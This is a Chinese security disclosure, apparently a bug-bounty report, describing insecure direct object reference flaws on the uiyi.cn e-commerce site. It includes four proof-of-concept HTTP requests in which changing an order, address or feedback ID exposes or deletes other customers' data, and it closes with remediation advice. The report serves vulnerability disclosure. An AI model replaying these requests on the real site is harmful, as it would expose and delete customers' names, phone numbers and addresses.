佑一良品()主站多处平行越权漏洞,主要有以下几个功能:


1,收货地址删除功能;

2,收货地址修改查看功能;

3,订单取消功能;

4,意见反馈删除功能。

以上几个功能都存在平行越权漏洞,大概请求分别如下:

1)订单取消功能:

POST /Cancel/NewCancelOrder HTTP/1.1

Host: my.uiyi.cn



OrderNo=16041475458



2)收货地址修改查看功能:

GET /CheckOut/GetReceiverById?ran=0.8655094487335167&ReceiverId=208813 HTTP/1.1

Host: cart.uiyi.cn



3)意见反馈删除功能:

POST /ComplaintAdvise/Delete HTTP/1.1

Host: my.uiyi.cn



ReviewID=27645



4)收货地址删除功能:

POST /Shipping_address/Delete HTTP/1.1

Host: my.uiyi.cn



ReceiverId=208822

以上几个功能请求都存在平行越权漏洞,通过修改各id的值就能对其它用户的收货地址,订单等进行查看删除,会泄露用户的电话、地址、姓名等等敏感信息。
 

上一张收货地址越权查看的证明图:
 

1.png


 

2.png



只需要写个简单的脚本,就能获取全站客户的各种敏感信息。其它的越权删除之类的就不一一截图了。

解决方案:

1,检查所有类似的操作,进行严格权限验证;

2,验证session,判断用户是否有权限对当前的收货地址等进行操作。